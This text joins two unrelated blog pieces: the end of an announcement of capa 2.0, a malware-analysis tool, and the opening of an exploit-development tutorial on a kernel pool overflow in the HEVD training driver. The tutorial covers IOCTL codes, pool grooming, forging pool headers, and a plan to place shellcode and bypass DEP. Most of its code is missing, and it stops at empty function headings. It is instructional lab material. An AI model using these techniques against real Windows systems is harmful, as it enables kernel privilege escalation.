Furthermore, library function identification drastically improves capa runtime performance: since capa skips processing of library functions, it can avoid the costly rule matching steps across a substantial percentage of real-world functions. Across our testbed of 206 samples, 28% of the 186,000 total functions are recognized as library code by our function signatures. As our implementation can recognize around 100,000 functions/sec, library function identification overhead is negligible and capa is approximately 25% faster than in 2020!

Finally, we introduced a new feature class that rule authors can use to match recognized library functions: function-name. This feature matches at the file-level scope. We’ve already started using this new capability to recognize specific implementations of cryptography routines, such as AES provided by Crypto++, as shown in the example rule in Figure 7.


Figure 7: Example rule using function-name to recognize AES via Crypto++

As we developed rules for interesting behaviors, we learned a lot about where uncommon techniques are used legitimately. For example, as malware analysts, we most commonly see the cpuid instruction alongside anti-analysis checks, such as in VM detection routines. Therefore, we naively crafted rules to flag this instruction. But, when we tested it against our testbed, the rule matched most modern programs because this instruction is often legitimately used in high-optimized routines, such as memcpy, to opt-in to newer CPU features. In hindsight, this is obvious, but at the time it was a little surprising to see cpuid in around 15% of all executables. With the new FLIRT support, capa recognizes the optimized memcpy routine embedded by Visual Studio and won’t flag the embedded cpuid instruction, as it's not part of the programmer’s code.

When a user upgrades to capa 2.0, they’ll see that the tool runs faster and provides more precise results.

Signature Generation

To provide the benefits of python-flirt to all users (especially those without an IDA Pro license) we have spent significant time to create a comprehensive FLIRT signature set for the common malware analysis use-case. The signatures come included with capa and are also available at our GitHub under the Apache 2.0 license. We believe that other projects can benefit greatly from this. For example, we expect the performance of FLOSS to improve once we’ve incorporated library function identification. Moreover, you can use our signatures with IDA Pro to recognize more library code.

Our initial signatures include:

  • From Microsoft Visual Studio (VS), for all major versions from VS6 to VS2019:
    • C and C++ run-time libraries
    • Active Template Library (ATL) and Microsoft Foundation Class (MFC) libraries
  • The following open-source projects as compiled with VS2015, VS2017, and VS2019:
    • CryptoPP
    • curl
    • Microsoft Detours
    • Mbed TLS (previously PolarSSL)
    • OpenSSL
    • zlib

Identifying and collecting the relevant library and object files took a lot of work. For the older VS versions this was done manually. For newer VS versions and the respective open-source projects we were able to automate the process using vcpgk and Docker.

We then used the IDA Pro FLAIR utilities to convert gigabytes of executable code into pattern files and then into signatures. This process required extensive research and much trial and error. For instance, we spent two weeks testing and exploring the various FLAIR options to understand the best combination. We appreciate Hex-Rays for providing high-quality signatures for IDA Pro and thank them for sharing their research and tools with the community.

To learn more about the pattern and signature file generation check out the siglib repository. The FLAIR utilities are available in the protected download area on Hex-Rays’ website.

Rule Updates

Since the initial release, the community has more than doubled the total capa rule count from 260 to over 570 capability detection rules! This means that capa recognizes many more techniques seen in real-world malware, certainly saving analysts time as they reverse engineer programs. And to reiterate, we’ve surfed a wave of support as almost 30 colleagues from a dozen organizations have volunteered their experience to develop these rules. Thank you!

Figure 8 provides a high-level overview of capabilities capa currently captures, including:

  • Host Interaction describes program functionality to interact with the file system, processes, and the registry
  • Anti-Analysis describes packers, Anti-VM, Anti-Debugging, and other related techniques
  • Collection describes functionality used to steal data such as credentials or credit card information
  • Data Manipulation describes capabilities to encrypt, decrypt, and hash data
  • Communication describes data transfer techniques such as HTTP, DNS, and TCP


Figure 8: Overview of capa rule categories

More than half of capa’s rules are associated with a MITRE ATT&CK technique including all techniques introduced in ATT&CK version 9 that lie within capa’s scope. Moreover, almost half of the capa rules are currently associated with a Malware Behavior Catalog (MBC) identifier.

For more than 70% of capa rules we have collected associated real-world binaries. Each binary implements interesting capabilities and exhibits noteworthy features. You can view the entire sample collection at our capa test files GitHub page. We rely heavily on these samples for developing and testing code enhancements and rule updates.

Python 3 Support

Finally, we’ve spent nearly three months migrating capa from Python 2.7 to Python 3. This involved working closely with vivisect and we would like to thank the team for their support. After extensive testing and a couple of releases supporting two Python versions, we’re excited that capa 2.0 and future versions will be Python 3 only.

Conclusion

Now that you’ve seen all the recent improvements to capa, we hope you’ll upgrade to the newest capa version right away! Thanks to library function identification capa will report faster and more relevant results. Hundreds of new rules capture the most interesting malware functionality while the improved capa explorer plugin helps you to focus your analysis and codify your malware knowledge while it’s fresh.

Standalone binaries for Windows, Mac, and Linux are available on the capa Releases page. To install capa from PyPi use the command pip install flare-capa. The source code is available at our capa GitHub page. The project page on GitHub contains detailed documentation, including thorough installation instructions and a walkthrough of capa explorer. Please use GitHub to ask questions, discuss ideas, and submit issues.

We highly encourage you to contribute to capa’s rule corpus. The improved IDA Pro plugin makes it easier than ever before. If you have any issues or ideas related to rules, please let us know on the GitHub repository. Remember, when you share a rule with the community, you scale your impact across hundreds of reverse engineers in dozens of organizations.

Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 2

Introduction

This blog serves as Part 2 of a two-part series about pool corruption in the age of the segment heap on Windows. Part 1, which can be found here starts this series out by leveraging an out-of-bounds read vulnerability to bypass kASLR from low integrity. Chaining this information leak vulnerability with the bug outlined in this post, which is a pool overflow leading to an arbitrary read/write primitive, we will close out this series by outlining why pool corruption in the age of the segment heap has had the scope of techniques, in my estimation, lessened from the days of Windows 7.

Due to the release of Windows 11 recently, which will have Virtualization-Based Security (VBS) and Hypervisor Protected Code Integrity (HVCI) enabled by default, we will pay homage to page table entry corruption techniques to bypass SMEP and DEP in the kernel with the exploit outlined in this blog post. Although Windows 11 will not be found in the enterprise for some time, as is the case with rolling out new technologies in any enterprise - vulnerability researchers will need to start moving away from leveraging artificially created executable memory regions in the kernel to execute code to either data-only style attacks or to investigate more novel techniques to bypass VBS and HVCI. This is the direction I hope to start taking my research in the future. This will most likely be the last post of mine which leverages page table entry corruption for exploitation.

Although there are much better explanations of pool internals on Windows, such as this paper and my coworker Yarden Shafir’s upcoming BlackHat 2021 USA talk found here, Part 1 of this blog series will contain much of the prerequisite knowledge used for this blog post - so although there are better resources, I urge you to read Part 1 first if you are using this blog post as a resource to follow along (which is the intent and explains the length of my posts).

Vulnerability Analysis

Let’s take a look at the source code for BufferOverflowNonPagedPoolNx.c in the win10-klfh branch of HEVD, which reveals a rather trivial and controlled pool-based buffer overflow vulnerability.

The first function within the source file is TriggerBufferOverflowNonPagedPoolNx. This function, which returns a value of type NTSTATUS, is prototyped to accept a buffer, UserBuffer and a size, Size. TriggerBufferOverflowNonPagedPoolNx invokes the kernel mode API ExAllocatePoolWithTag to allocate a chunk from the NonPagedPoolNx pool of size POOL_BUFFER_SIZE. Where does this size come from? Taking a look at the very beginning of BufferOverflowNonPagedPoolNx.c we can clearly see that BufferOverflowNonPagedPoolNx.h is included.

Taking a look at this header file, we can see a #define directive for the size, which is determined by a processor directive to make this variable 16 on a Windows 64-bit machine, which we are testing from. We now know that the pool chunk that will be allocated from the call to ExAllocatePoolWithTag within TriggerBufferOverfloowNx is 16 bytes.

The kernel mode pool chunk, which is now allocated on the NonPagedPoolNx is managed by the return value of ExAllocatePoolWithTag, which is KernelBuffer in this case. Looking a bit further down the code we can see that RtlCopyMemory, which is a wrapper for a call to memcpy, copies the value UserBuffer into the allocation managed by KernelBuffer. The size of the buffer copied into KernelBuffer is managed by Size. After the chunk is written to, based on the code in BufferOverflowNonPagedPoolNx.c, the pool chunk is also subsequently freed.

This basically means that the value specified by Size and UserBuffer will be used in the copy operation to copy memory into the pool chunk. We know that UserBuffer and Size are baked into the function definition for TriggerBufferOverflowNonPagedPoolNx, but where do these values come from? Taking a look further into BufferOverflowNonPagedPoolNx.c, we can actually see these values are extracted from the IRP sent to this function via the IOCTL handler.

This means that the client interacting with the driver via DeviceIoControl is able to control the contents and the size of the buffer copied into the pool chunk allocated on the NonPagedPoolNx, which is 16 bytes. The vulnerability here is that we can control the size and contents of the memory copied into the pool chunk, meaning we could specify a value greater than 16, which would write to memory outside the bounds of the allocation, a la an out-of-bounds write vulnerability, known as a “pool overflow” in this case.

Let’s put this theory to the test by expanding upon our exploit from part one and triggering the vulnerability.

Triggering The Vulnerability

We will leverage the previous exploit from Part 1 and tack on the pool overflow code to the end, after the for loop which does parsing to extract the base address of HEVD.sys. This code can be seen below, which sends a buffer of 50 bytes to the pool chunk of 16 bytes. The IOCTL for to reach the TriggerBufferOverflowNonPagedPool function is 0x0022204b

After this allocation is made and the pool chunk is subsequently freed, we can see that a BSOD occurs with a bug check indicating that a pool header has been corrupted.

This is the result of our out-of-bounds write vulnerability, which has corrupted a pool header. When a pool header is corrupted and the chunk is subsequently freed, an “integrity” check is performed on the in-scope pool chunk to ensure it has a valid header. Because we have arbitrarily written contents past the pool chunk allocated for our buffer sent from user mode, we have subsequently overwritten other pool chunks. Due to this, and due to every chunk in the kLFH, which is where our allocation resides based on heuristics mentioned in Part 1, being prepended with a _POOL_HEADER structure - we have subsequently corrupted the header of each subsequent chunk. We can confirm this by setting a breakpoint on on call to ExAllocatePoolWithTag and enabling debug printing to see the layout of the pool before the free occurs.

The breakpoint set on the address fffff80d397561de, which is the first breakpoint seen being set in the above photo, is a breakpoint on the actual call to ExAllocatePoolWithTag. The breakpoint set at the address fffff80d39756336 is the instruction that comes directly before the call to ExFreePoolWithTag. This breakpoint is hit at the bottom of the above photo via Breakpoint 3 hit. This is to ensure execution pauses before the chunk is freed.

We can then inspect the vulnerable chunk responsible for the overflow to determine if the _POOL_HEADER tag corresponds with the chunk, which it does.

After letting execution resume, a bug check again incurs. This is due to a pool chunk being freed which has an invalid header.

This validates that an out-of-bounds write does exist. The question is now, with a kASLR bypass in hand - how to we comprehensively execute kernel-mode code from user mode?

Exploitation Strategy

Fair warning - this section contains a lot code analysis to understand what this driver is doing in order to groom the pool, so please bear this in mind.

As you can recall from Part 1, the key to pool exploitation in the age of the segment heap it to find objects, when exploiting the kLFH specifically, that are of the same size as the vulnerable object, contain an interesting member in the object, can be called from user mode, and are allocated on the same pool type as the vulnerable object. We can recall earlier that the size of the vulnerable object was 16 bytes in size. The goal here now is to look at the source code of the driver to determine if there isn’t a useful object that we can allocate which will meet all of the specified parameters above. Note again, this is the toughest part about pool exploitation is finding objects worthwhile.

Luckily, and slightly contrived, there are two files called ArbitraryReadWriteHelperNonPagedPoolNx.c and ArbitraryReadWriteHelperNonPagedPoolNx.h, which are useful to us. As the name can specify, these files seem to allocate some sort of object on the NonPagedPoolNx. Again, note that at this point in the real world we would need to reverse engineer the driver and look at all instances of pool allocations, inspect their arguments at runtime, and see if there isn’t a way to get useful objects on the same pool and kLFH bucket as the vulnerable object for pool grooming.

ArbitraryReadWriteHelperNonPagedPoolNx.h contains two interesting structures, seen below, as well several function definitions (which we will touch on later - please make sure you become familiar with these structures and their members!).

As we can see, each function definition defines a parameter of type PARW_HELPER_OBJECT_IO, which is a pointer to an ARW_HELP_OBJECT_IO object, defined in the above image!

Let’s examine ArbitraryReadWriteHelpeNonPagedPoolNx.c in order to determine how these ARW_HELPER_OBJECT_IO objects are being instantiated and leveraged in the defined functions in the above image.

Looking at ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see it contains several IOCTL handlers. This is indicative that these ARW_HELPER_OBJECT_IO objects will be sent from a client (us). Let’s take a look at the first IOCTL handler.

It appears that ARW_HELPER_OBJECT_IO objects are created through the CreateArbitraryReadWriteHelperObjectNonPagedPoolNxIoctlHandler IOCTL handler. This handler accepts a buffer, casts the buffer to type ARW_HELP_OBJECT_IO and passes the buffer to the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Let’s inspect CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

CreateArbitraryReadWriteHelperObjectNonPagedPoolNx first declares a few things:

  1. A pointer called Name
  2. A SIZE_T variable, Length
  3. An NTSTATUS variable which is set to STATUS_SUCCESS for error handling purposes
  4. An integer, FreeIndex, which is set to the value STATUS_INVALID_INDEX
  5. A pointer of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX, called ARWHelperObject, which is a pointer to a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we saw previously defined in ArbitraryReadWriteHelperNonPagedPoolNx.h.

The function, after declaring the pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX previously mentioned, probes the input buffer from the client, parsed from the IOCTL handler, to verify it is in user mode and then stores the length specified by the ARW_HELPER_OBJECT_IO structure’s Length member into the previously declared variable Length. This ARW_HELPER_OBJECT_IO structure is taken from the user mode client interacting with the driver (us), meaning it is supplied from the call to DeviceIoControl.

Then, a function called GetFreeIndex is called and the result of the operation is stored in the previously declared variable FreeIndex. If the return value of this function is equal to STATUS_INVALID_INDEX, the function returns the status to the caller. If the value is not STATUS_INVALID_INDEX, CreateArbitraryReadWriteHelperObjectNonPagedPoolNx then calls ExAllocatePoolWithTag to allocate memory for the previously declared PARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointer, which is called ARWHelperObject. This object is placed on the NonPagedPoolNx, as seen below.

After allocating memory for ARWHelperObject, the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then allocates another chunk from the NonPagedPoolNx and allocates this memory to the previously declared pointer Name.

This newly allocated memory is then initialized to zero. The previously declared pointer, ARWHelperObject, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT, then has its Name member set to the previously declared pointer Name, which had its memory allocated in the previous ExAllocatePoolWithTag operation, and its Length member set to the local variable Length, which grabbed the length sent by the user mode client in the IOCTL operation, via the input buffer of type ARW_HELPER_OBJECT_IO, as seen below. This essentially just initializes the structure’s values.

Then, an array called g_ARWHelperOjbectNonPagedPoolNx, at the index specified by FreeIndex, is initialized to the address of the ARWHelperObject. This array is actually an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, and managed such objects. This is defined at the beginning of ArbitraryReadWriteHelperNonPagedPoolNx.c, as seen below.

Before moving on - I realize this is a lot of code analysis, but I will add in diagrams and tl;dr’s later to help make sense of all of this. For now, let’s keep digging into the code.

Let’s recall how the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function was prototyped:

NTSTATUS
CreateArbitraryReadWriteHelperObjectNonPagedPoolNx(
    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
);

This HelperObjectIo object is of type PARW_HELPER_OBJECT_IO, which is supplied by a user mode client (us). This structure, which is supplied by us via DeviceIoControl, has its HelperObjectAddress member set to the address of the ARWHelperObject previously allocated in CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. This essentially means that our user mode structure, which is sent to kernel mode, has one of its members, HelperObjectAddress to be specific, set to the address of another kernel mode object. This means this will be bubbled back up to user mode. This is the end of the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function! Let’s update our code to see how this looks dynamically. We can also set a breakpoint on HEVD!CreateArbitraryReadWriteHelperObjectNonPagedPoolNx in WinDbg. Note that the IOCTL to trigger CreateArbitraryReadWriteHelperObjectNonPagedPoolNx is 0x00222063.

We know now that this function will allocate a pool chunk for the ARWHelperObject pointer, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on the call to ExAllocatePoolWIthTag responsible for this, and enable debug printing.

Also note the debug print Name Length is zero. This value was supplied by us from user mode, and since we instantiated the buffer to zero, this is why the length is zero. The FreeIndex is also zero. We will touch on this value later on. After executing the memory allocation operation and inspecting the return value, we can see the familiar Hack pool tag, which is 0x10 bytes (16 bytes) + 0x10 bytes for the _POOL_HEADER_ structure - making this a total of 0x20 bytes. The address of this ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is 0xffff838b6e6d71b0.

We then know that another call to ExAllocatePoolWithTag will occur, which will allocate memory for the Name member of ARWHelperObject->Name, where ARWHelperObject is of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on this memory allocation operation and inspect the contents of the operation.

We can see this chunk is allocated in the same pool and kLFH bucket as the previous ARWHelperObject pointer. The address of this chunk, which is 0xffff838b6e6d73d0, will eventually be set as ARWHelperObject’s Name member, along with ARWHelperObject’s Length member being set to the original user mode input buffer’s Length member, which comes from an ARW_HELPER_OBJECT_IO structure.

From here we can press g in WinDbg to resume execution.

We can clearly see that the kernel-mode address of the ARWHelperObject pointer is bubbled back to user mode via the HelperObjectAddress of the ARW_HELPER_OBJECT_IO object specified in the input and output buffer parameters of the call to DeviceIoControl.

Let’s re-execute everything again and capture the output.

Notice anything? Each time we call CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, based on the analysis above, there is always a PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT created. We know there is also an array of these objects created and the created object for each given CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function call is assigned to the array at index FreeIndex. After re-running the updated code, we can see that by calling the function again, and therefore creating another object, the FreeIndex value was increased by one. Re-executing everything again for a second time, we can see this is the case again!

We know that this FreeIndex variable is set via a function call to the GetFreeIndex function, as seen below.

Length = HelperObjectIo->Length;

        DbgPrint("[+] Name Length: 0x%X\n", Length);

        //
        // Get a free index
        //

        FreeIndex = GetFreeIndex();

        if (FreeIndex == STATUS_INVALID_INDEX)
        {
            //
            // Failed to get a free index
            //

            Status = STATUS_INVALID_INDEX;
            DbgPrint("[-] Unable to find FreeIndex: 0x%X\n", Status);

            return Status;
        }

Let’s examine how this function is defined and executed. Taking a look in ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see the function is defined as such.

This function, which returns an integer value, performs a for loop based on MAX_OBJECT_COUNT to determine if the g_ARWHelperObjectNonPagedPoolNx array, which is an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NXs, has a value assigned for a given index, which starts at 0. For instance, the for loop first checks if the 0th element in the g_ARWHelperObjectNonPagedPoolNx array is assigned a value. If it is assigned, the index into the array is increased by one. This keeps occurring until the for loop can no longer find a value assigned to a given index. When this is the case, the current value used as the counter is assigned to the value FreeIndex. This value is then passed to the assignment operation used to assign the in-scope ARWHelperObject to the array managing all such objects. This loop occurs MAX_OBJECT_COUNT times, which is defined in ArbitraryReadWriteHelperNonPagedPoolNx.h as #define MAX_OBJECT_COUNT 65535. This is the total amount of objects that can be managed by the g_ARWHelperObjectNonPagedPoolNx array.

The tl;dr of what happens here is in the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function is:

  1. Create a PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT object called ARWHelperObject
  2. Set the Name member of ARWHelperObject to a buffer on the NonPagedPoolNx, which has a value of 0
  3. Set the Length member of ARWHelperObject to the value specified by the user-supplied input buffer via DeviceIoControl
  4. Assign this object to an array which manages all active PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT objects
  5. Return the address of the ARWHelpeObject to user mode via the output buffer of DeviceIoControl

Here is a diagram of this in action.

Let’s take a look at the next IOCTL handler after CreateArbitraryReadWriteHelperObjectNonPagedPoolNx which is SetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler. This IOCTL handler will take the user buffer supplied by DeviceIoControl, which is expected to be of type ARW_HELPER_OBJECT_IO. This structure is then passed to the function SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, which is prototyped as such:

NTSTATUS
SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx(
    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
)

Let’s take a look at what this function will do with our input buffer. Recall last time we were able to specify the length that was used in the operation on the size of the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object ARWHelperObject. Additionally, we were able to return the address of this pointer to user mode.

This function starts off by defining a few variables:

  1. A pointer named Name
  2. A pointer named HelperObjectAddress
  3. An integer value named Index which is assigned to the status STATUS_INVALID_INDEX
  4. An NTSTATUS code

After these values are declared, This function first checks to make sure the input buffer from user mode, the ARW_HELPER_OBJECT_IO pointer, is in user mode. After confirming this, The Name member, which is a pointer, from this user mode buffer is stored into the pointer Name, previously declared in the listing of declared variables. The HelperObjectAddress member from the user mode buffer - which, after the call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, contained the kernel mode address of the PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT ARWHelperObject, is extracted and stored into the declared HelperObjectAddress at the beginning of the function.

A call to GetIndexFromPointer is made, with the address of the HelperObjectAddress as the argument in this call. If the return value is STATUS_INVALID_INDEX, an NTSTATUS code of STATUS_INVALID_INDEX is returned to the caller. If the function returns anything else, the Index value is printed to the screen.

Where does this value come from? GetIndexFromPointer is defined as such.

This function will accept a value of any pointer, but realistically this is used for a pointer to a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. This function takes the supplied pointer and indexes the array of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers, g_ARWHelperObjectNonPagedPoolNx. If the value hasn’t been assigned to the array (e.g. if CreateArbitraryReadWriteHelperObjectNonPagedPoolNx wasn’t called, as this will assign any created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX to the array or the object was freed), STATUS_INVALID_INDEX is returned. This function basically makes sure the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is managed by the array. If it does exist, this function returns the index of the array the given object resides in.

Let’s take a look at the next snipped of code from the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

After confirming the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX exists, a check is performed to ensure the Name pointer, which was extracted from the user mode buffer of type PARW_HELPER_OBJECT_IO’s Name member, is in user mode. Note that g_ARWHelperObjectNonPagedPoolNx[Index] is being used in this situation as another way to reference the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, since all g_ARWHelperObjectNonPagedPoolNx is at the end of the day is an array, of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX, which manages all active ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers.

After confirming the buffer is coming from user mode, this function finishes by copying the value of Name, which is a value supplied by us via DeviceIoControl and the ARW_HELPER_OBJECT_IO object, to the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

Let’s test this theory in WinDbg. What we should be looking for here is the value specified by the Name member of our user-supplied ARW_HELPER_OBJECT_IO should be written to the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created in the previous call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Our updated code looks as follows.

The above code should overwrite the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Note that the IOCTL for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x00222067.

We can then set a breakpoint in WinDbg to perform dynamic analysis.

Then we can set a breakpoint on ProbeForRead, which will take the first argument, which is our user-supplied ARW_HELPER_OBJECT_IO, and verify if it is in user mode. We can parse this memory address in WinDbg, which would be in RCX when the function call occurs due to the __fastcall calling convention, and see that this not only is a user-mode buffer, but it is also the object we intended to send from user mode for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

This HelperObjectAddress value is the address of the previously created/associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. We can also verify this in WinDbg.

Recall from earlier that the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object has it’s Length member taken from the Length sent from our user-mode ARW_HELPER_OBJECT_IO structure. The Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is also initialized to zero, per the RtlFillMemory call from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx routine - which initializes the Name buffer to 0 (recall the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is actually a buffer that was allocated via ExAllocatePoolWithTag by using the specified Length of our ARW_HELPER_OBJECT_IO structure in our DeviceIoControl call).

ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name is the member that should be overwritten with the contents of the ARW_HELPER_OBJECT_IO object we sent from user mode, which currently is set to 0x4141414141414141. Knowing this, let’s set a breakpoint on the RtlCopyMemory routine, which will show up as memcpy in HEVD via WinDbg.

This fails. The error code here is actually access denied. Why is this? Recall that there is a one final call to ProbeForRead directly before the memcpy call.

ProbeForRead(
    Name,
    g_ARWHelperObjectNonPagedPoolNx[Index]->Length,
    (ULONG)__alignof(UCHAR)
);

The Name variable here is extracted from the user-mode buffer ARW_HELPER_OBJECT_IO. Since we supplied a value of 0x4141414141414141, this technically isn’t a valid address and the call to ProbeForRead will not be able to locate this address. Instead, let’s create a user-mode pointer and leverage it instead!

After executing the code again and hitting all the breakpoints, we can see that execution now reaches the memcpy routine.

After executing the memcpy routine, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function now points to the value specified by our user-mode buffer, 0x4141414141414141.

We are starting to get closer to our goal! You can see this is pretty much an uncontrolled arbitrary write primitive in and of itself. The issue here however is that the value we can overwrite, which is ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name is a pointer which is allocated in the kernel via ExAllocatePoolWithTag. Since we cannot directly control the address stored in this member, we are limited to only overwriting what the kernel provides us. The goal for us will be to use the pool overflow vulnerability to overcome this (in the future).

Before getting to the exploitation phase, we need to investigate one more IOCTL handler, plus the IOCTL handler for deleting objects, which should not be time consuming.

The last IOCTL handler to investigate is the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler IOCTL handler.

This handler passes the user-supplied buffer, which is of type ARW_HELPER_OBJECT_IO to GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx. This function is identical to the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function, in that it will copy one Name member to another Name member, but in reverse order. As seen below, the Name member used in the destination argument for the call to RtlCopyMemory is from the user-supplied buffer this time.

This means that if we used the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function to overwrite the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then we could use the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx to get the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object and bubble it up back to user mode. Let’s modify our code to outline this. The IOCTL code to reach the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x0022206B.

In this case we do not need WinDbg to validate anything. We can simply set the contents of our ARW_HELPER_OBJECT_IO.Name member to junk as a POC that after the IOCL call to reach GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, this member will be overwritten by the contents of the associated/previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which will be 0x4141414141414141.

Since tempBuffer is assigned to ARW_HELPER_OBJECT_IO.Name, this is technically the value that will inherit the contents of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name in the memcpy operation from the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function. As we can see, we can successfully retrieve the contents of the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name object. Again, however, the issue is that we are not able to choose what ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name points to, as this is determined by the driver. We will use our pool overflow vulnerability soon to overcome this limitation.

The last IOCTL handler is the delete operation, found in DeleteArbitraryReadWriteHelperObjecNonPagedPoolNxIoctlHandler.

This IOCTL handler parses the input buffer from DeviceIoControl as an ARW_HELPER_OBJECT_IO structure. This buffer is then passed to the DeleteArbitraryReadWriteHelperObjecNonPagedPoolNx function.

This function is pretty simplistic - since the HelperObjectAddress is pointing to the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, this member is used in a call to ExAllocateFreePoolWithTag to free the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Additionally, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member, which also is allocated by ExAllocatePoolWithTag is freed.

Now that we know all of the ins-and-outs of the driver’s functionality, we can continue (please note that we are fortunate to have source code in this case. Leveraging a disassembler make take a bit more time to come to the same conclusions we were able to come to).

Okay, Now Let’s Get Into Exploitation (For Real This Time)

We know that our situation currently allows for an uncontrolled arbitrary read/write primitive. This is because the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member is set currently to the address of a pool allocation via ExAllocatePoolWithTag. With our pool overflow we will try to overwrite this address to a meaningful address. This will allow for us to corrupt a controlled address - thus allowing us to obtain an arbitrary read/write primitive.

Our strategy for grooming the pool, due to all of these objects being the same size and being allocated on the same pool type (NonPagedPoolNx), will be as follows:

  1. “Fill the holes” in the current page servicing allocations of size 0x20
  2. Groom the pool to obtain the following layout: VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
  3. Leverage the read/write primitive to write our shellcode, one QWORD at a time, to KUSER_SHARED_DATA+0x800 and flip the no-eXecute bit to bypass kernel-mode DEP

Recall earlier the sentiment about needing to preserve _POOL_HEADER structures? This is where everything goes full circle for us. Recall from Part 1 that the kLFH still uses the legacy _POOL_HEADER structures to process and store metadata for pool chunks. This means there is no encoding going on, and it is possible to hardcode the header into the exploit so that when the pool overflow occurs we can make sure when the header is overwritten it is overwritten with the same content as before.

Let’s inspect the value of a _POOL_HEADER of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we would be overflowing into.

Since this chunk is 16 bytes and will be part of the kLFH, it is prepended with a standard _POOL_HEADER structure. Since this is the case, and there is no encoding, we can simply hardcode the value of the _POOL_HEADER (recall that the _POOL_HEADER will be 0x10 bytes before the value returned by ExAllocatePoolWithTag). This means we can hardcode the value 0x6b63614802020000 into our exploit so that at the time of the overflow into the next chunk, which should be into one of these ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects we have previously sprayed, the first 0x10 bytes that are overflown of this chunk, which will be the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX’s _POOL_HEADER, will be preserved and kept as valid, bypassing the earlier issue shown when an invalid header occurs.

Knowing this, and knowing we have a bit of work to do, let’s rearrange our current exploit to make it more logical. We will create three functions for grooming:

  1. fillHoles()
  2. groomPool()
  3. pokeHoles()

These functions can be seen below.

fillHoles()

groomPool()

pokeHoles()

